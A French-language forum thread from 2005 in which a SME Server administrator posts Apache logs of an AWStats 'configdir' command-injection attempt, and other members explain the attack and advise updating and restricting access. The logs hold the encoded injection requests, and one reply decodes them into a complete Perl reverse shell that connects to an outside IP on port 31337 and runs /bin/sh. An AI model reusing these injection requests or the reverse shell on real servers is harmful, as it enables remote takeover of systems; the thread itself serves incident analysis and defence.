Tentatve d'accès frauduleux ???

Forum dédié à la distribution du même nom et que vous pourrez télécharger sur http://www.contribs.org. La nouvelle version de cette distribution se nomme SME Server

Modérateur: modos Ixus

Publier une réponse

Tentatve d'accès frauduleux ???

Messagepar titchek » 20 Mai 2005 19:04

Bonsoir à tous,

En regardant les logs de mon serveur http, j'ai trouvé les infos suivantes :

--------------------------------------------------------------------------------------------------------------
[20/May/2005:01:25:39 +0200] "GET cgi-bin/awstats.pl?configdir=|perl%20-e%20%22print%20%5C%22%5Cx23%5Cx21%5Cx2f%5Cx75%5Cx73%5Cx72%5Cx2f%5Cx62%5Cx69%5Cx6e%5Cx2f%5Cx70%5Cx65%5Cx72%5Cx6c%5Cx0a%5Cx75%5Cx73%5Cx65%5Cx20%5Cx53%5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx3b%5Cx20%5Cx75%5Cx73%5Cx65%5Cx20%5Cx49%5Cx4f%5Cx3a%5Cx3a%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx3b%5Cx20%5Cx75%5Cx73%5Cx65%5Cx20%5Cx50%5Cx4f%5Cx53%5Cx49%5Cx58%5Cx3b%5Cx20%5Cx24%5Cx70%5Cx72%5Cx6f%5Cx74%5Cx6f%5Cx20%5Cx3d%5Cx20%5Cx67%5Cx65%5Cx74%5Cx70%5Cx72%5Cx6f%5Cx74%5Cx6f%5Cx62%5Cx79%5Cx6e%5Cx61%5Cx6d%5Cx65%5Cx28%5Cx27%5Cx74%5Cx63%5Cx70%5Cx27%5Cx29%5Cx3b%5C%22%22%20%3E/var/tmp/.vetx.95| HTTP/1.1" 200 1074 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040116 MultiZilla/1.6.3.1d"
[20/May/2005:01:25:40 +0200] "GET /cgi-bin/awstats.pl?configdir=|perl%20-e%20%22print%20%5C%22%5Cx20%5Cx73%5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx28%5Cx53%5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx5f%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx2c%5Cx20%5Cx41%5Cx46%5Cx5f%5Cx49%5Cx4e%5Cx45%5Cx54%5Cx2c%5Cx20%5Cx53%5Cx4f%5Cx43%5Cx4b%5Cx5f%5Cx53%5Cx54%5Cx52%5Cx45%5Cx41%5Cx4d%5Cx2c%5Cx20%5Cx24%5Cx70%5Cx72%5Cx6f%5Cx74%5Cx6f%5Cx29%5Cx3b%5Cx20%5Cx24%5Cx73%5Cx69%5Cx6e%5Cx20%5Cx3d%5Cx20%5Cx73%5Cx6f%5Cx63%5Cx6b%5Cx61%5Cx64%5Cx64%5Cx72%5Cx5f%5Cx69%5Cx6e%5Cx28%5Cx33%5Cx31%5Cx33%5Cx33%5Cx37%5Cx2c%5Cx69%5Cx6e%5Cx65%5Cx74%5Cx5f%5Cx61%5Cx74%5C%22%22%20%3E%3E/var/tmp/.vetx.95| HTTP/1.1" 200 1074 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040116 MultiZilla/1.6.3.1d"
[20/May/2005:01:25:42 +0200] "GET /cgi-bin/awstats.pl?configdir=|perl%20-e%20%22print%20%5C%22%5Cx6f%5Cx6e%5Cx28%5Cx22%5Cx36%5Cx31%5Cx2e%5Cx32%5Cx31%5Cx39%5Cx2e%5Cx32%5Cx32%5Cx36%5Cx2e%5Cx32%5Cx30%5Cx36%5Cx22%5Cx20%5Cx29%5Cx29%5Cx3b%5Cx20%5Cx63%5Cx6f%5Cx6e%5Cx6e%5Cx65%5Cx63%5Cx74%5Cx28%5Cx53%5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx5f%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx2c%5Cx24%5Cx73%5Cx69%5Cx6e%5Cx29%5Cx3b%5Cx20%5Cx64%5Cx75%5Cx70%5Cx32%5Cx28%5Cx53%5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx5f%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx2d%5Cx3e%5Cx66%5Cx69%5Cx6c%5Cx65%5Cx6e%5Cx6f%5Cx2c%5Cx20%5Cx30%5Cx29%5Cx3b%5Cx20%5Cx64%5C%22%22%20%3E%3E/var/tmp/.vetx.95| HTTP/1.1" 200 1074 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040116 MultiZilla/1.6.3.1d"
[20/May/2005:01:25:43 +0200] "GET /cgi-bin/awstats.pl?configdir=|perl%20-e%20%22print%20%5C%22%5Cx75%5Cx70%5Cx32%5Cx28%5Cx53%5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx5f%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx2d%5Cx3e%5Cx66%5Cx69%5Cx6c%5Cx65%5Cx6e%5Cx6f%5Cx2c%5Cx20%5Cx31%5Cx29%5Cx3b%5Cx20%5Cx64%5Cx75%5Cx70%5Cx32%5Cx28%5Cx53%5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx5f%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx2d%5Cx3e%5Cx66%5Cx69%5Cx6c%5Cx65%5Cx6e%5Cx6f%5Cx2c%5Cx20%5Cx32%5Cx29%5Cx3b%5Cx20%5Cx65%5Cx78%5Cx65%5Cx63%5Cx20%5Cx7b%5Cx20%5Cx22%5Cx2f%5Cx62%5Cx69%5Cx6e%5Cx2f%5Cx73%5Cx68%5Cx22%5Cx20%5Cx7d%5Cx20%5Cx22%5Cx22%5Cx3b%5Cx0a%5C%22%22%20%3E%3E/var/tmp/.vetx.95| HTTP/1.1" 200 1074 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040116 MultiZilla/1.6.3.1d"
[20/May/2005:01:25:45 +0200] "GET /cgi-bin/awstats.pl?configdir=|chmod%20755%20/var/tmp/.vetx.95| HTTP/1.1" 200 730 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040116 MultiZilla/1.6.3.1d"
[20/May/2005:01:25:46 +0200] "GET /cgi-bin/awstats.pl?configdir=|exec%20/var/tmp/.vetx.95| HTTP/1.1" 200 725 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040116 MultiZilla/1.6.3.1d"
[20/May/2005:01:25:48 +0200] "GET /cgi-bin/awstats.pl?configdir=|rm%20%2Df%20/var/tmp/.vetx.95| HTTP/1.1" 200 726 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040116 MultiZilla/1.6.3.1d"

---------------------------------------------------------------------------------------------

Qu'en pensent les gourous ??
Est-ce une tentative de piratage (voire un succès) ?

Merci de vos informations
Le français est une belle langue, respectez là ! Merci de corriger les fautes avant de poster.
Image[
Avatar de l’utilisateur
titchek
Capitaine de vaisseau
Capitaine de vaisseau
 
Messages: 274
Inscrit le: 15 Mai 2003 00:00
Localisation: Beyrouth - Liban
Haut

Messagepar JaDiuM » 20 Mai 2005 19:31

Bonjour,


Attention là il s'agit juste d'un test effectué par l'attaquant, la suite risque de venir rapidement.
Il faut impérativement updater awstat, puis si possible accepter les connexions vers awstats uniquement à partir du réseau interne. directive Allow from.

Cdt
" Quand on ne sait pas où l'on va, tous les chemins mènent à nulle part." [Kissinger]
Avatar de l’utilisateur
JaDiuM
Capitaine de vaisseau
Capitaine de vaisseau
 
Messages: 334
Inscrit le: 15 Jan 2004 01:00
Haut

Messagepar MasterSleepy » 20 Mai 2005 21:24

Salut,

Oui c'est une tentative d'intrusion dans ton système.
Si ta version de awstats est au minimum 6.3 tu ne risques rien. D'ailleurs je pense que tu ne risques rien.
Dans le cas contraire, toutes les pages index.html de tes sites auraient été modifiés.

Grand-pa avait lancé ce post http://forums.fr.ixus.net/viewtopic.php?t=25352 de la découverte de la faille.

A+
"Microsoft fera quelque chose qui ne plantera jamais quand ils commenceront à fabriquer des clous "
http://www.vanhees.cc
Avatar de l’utilisateur
MasterSleepy
Amiral
Amiral
 
Messages: 2625
Inscrit le: 24 Juil 2002 00:00
Localisation: Belgique
Haut

Messagepar titchek » 20 Mai 2005 21:29

Bonsoir MasterSleepy,

Effectivement, avant de soumettre mon post, j'avais relu les infos fournies par GranPa et je pense ne rien risquer (je suis en version 6.4). Mais comme les informations n'étaient pas (sans doute volontairement) extrèmement explicites sur les conditions de réalisations , j'ai préféré poser la question.

J'ai quand même passer un peu de temps à vérifier les fichiers et les files systems de mon serveur.

Merci de vos réponses
Le français est une belle langue, respectez là ! Merci de corriger les fautes avant de poster.
Image[
Avatar de l’utilisateur
titchek
Capitaine de vaisseau
Capitaine de vaisseau
 
Messages: 274
Inscrit le: 15 Mai 2003 00:00
Localisation: Beyrouth - Liban
Haut

Messagepar Franck78 » 21 Mai 2005 03:10

Salut Titcheck,


Je ne connais pas la faille de awstat mais en tout cas la réponse est toujours [+200]. Une ruse pour tromper l'ennemi, ou alors c'est réél.
edit : c'est pas le 200 auquel je pensais. Donc aucune idée du sort de la requète... Cependant le programme est bien valide lui.


En tout cas, ton programme se transforme en perl
Code: Tout sélectionner
#!/usr/bin/perl

print "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x75\x73\x65\x20\x53\x6f\x63\x6b\x65
\x74\x3b\x20\x75\x73\x65\x20\x49\x4f\x3a\x3a\x48\x61\x6e\x64\x6c\x65\x3b\x20\x75\x73\x65\x20\x50\x4
f\x53\x49\x58\x3b\x20\x24\x70\x72\x6f\x74\x6f\x20\x3d\x20\x67\x65\x74\x70\x72\x6f\x74\x6f\x62\x79\x6e
\x61\x6d\x65\x28\x27\x74\x63\x70\x27\x29\x3b";
print "\x20\x73\x6f\x63\x6b\x65\x74\x28\x53\x6f\x63\x6b\x65\x74\x5f\x48\x61\x6e\x64\x6c\x65\x2c\x20\x41\x46
\x5f\x49\x4e\x45\x54\x2c\x20\x53\x4f\x43\x4b\x5f\x53\x54\x52\x45\x41\x4d\x2c\x20\x24\x70\x72\x6f\x74
\x6f\x29\x3b\x20\x24\x73\x69\x6e\x20\x3d\x20\x73\x6f\x63\x6b\x61\x64\x64\x72\x5f\x69\x6e\x28\x33\x31
\x33\x33\x37\x2c\x69\x6e\x65\x74\x5f\x61\x74";
print "\x6f\x6e\x28\x22\x36\x31\x2e\x32\x31\x39\x2e\x32\x32\x36\x2e\x32\x30\x36\x22\x20\x29\x29\x3b\x20
\x63\x6f\x6e\x6e\x65\x63\x74\x28\x53\x6f\x63\x6b\x65\x74\x5f\x48\x61\x6e\x64\x6c\x65\x2c\x24\x73\x69
\x6e\x29\x3b\x20\x64\x75\x70\x32\x28\x53\x6f\x63\x6b\x65\x74\x5f\x48\x61\x6e\x64\x6c\x65\x2d\x3e\x66
\x69\x6c\x65\x6e\x6f\x2c\x20\x30\x29\x3b\x20\x64";
print "\x75\x70\x32\x28\x53\x6f\x63\x6b\x65\x74\x5f\x48\x61\x6e\x64\x6c\x65\x2d\x3e\x66\x69\x6c\x65\x6e
\x6f\x2c\x20\x31\x29\x3b\x20\x64\x75\x70\x32\x28\x53\x6f\x63\x6b\x65\x74\x5f\x48\x61\x6e\x64\x6c
\x65\x2d\x3e\x66\x69\x6c\x65\x6e\x6f\x2c\x20\x32\x29\x3b\x20\x65\x78\x65\x63\x20\x7b\x20\x22\x2f
\x62\x69\x6e\x2f\x73\x68\x22\x20\x7d\x20\x22\x22\x3b\x0a";




qui donne ce code résultant (a ne pas lancer a mon avis ;-) ) :

Code: Tout sélectionner
#!/usr/bin/perl
use Socket;
use IO::Handle;
use POSIX;
$proto = getprotobyname('tcp');
socket(Socket_Handle, AF_INET, SOCK_STREAM, $proto);
$sin = sockaddr_in(31337,inet_aton("61.219.226.206" ));
connect(Socket_Handle,$sin);
dup2(Socket_Handle->fileno, 0);
dup2(Socket_Handle->fileno, 1);
dup2(Socket_Handle->fileno, 2);
exec { "/bin/sh" } "";



Par contre tu peux surveiller son IP et le port 31337

Avoir:
http://www.securityfocus.com/archive/75/393292
Dernière édition par Franck78 le 22 Mai 2005 20:46, édité 2 fois au total.
Franck
L'art de poser une question sur ce site afin d'obtenir la réponse
A LIRE
Avatar de l’utilisateur
Franck78
Amiral
Amiral
 
Messages: 5625
Inscrit le: 20 Fév 2004 01:00
Localisation: Paris
Haut

Messagepar leso » 21 Mai 2005 09:57

Pour la version d'awstats 6.4 on prends directement sur le site source ou y'a un rpm spécial sme dispo quelque part?
MCITP Windows Server 2008, Enterprise Administrator
MCITP Windows Server 2008, Server Administrator
MCITP Exchange 2007 Enterprise Messaging Administrator
Avatar de l’utilisateur
leso
Vice-Amiral
Vice-Amiral
 
Messages: 648
Inscrit le: 03 Avr 2003 00:00
Localisation: Paris
Haut
Publier une réponse

Retour vers E-Smith / SME Server

Qui est en ligne ?

Utilisateur(s) parcourant actuellement ce forum : Aucun utilisateur inscrit et 1 invité

Powered by boolaz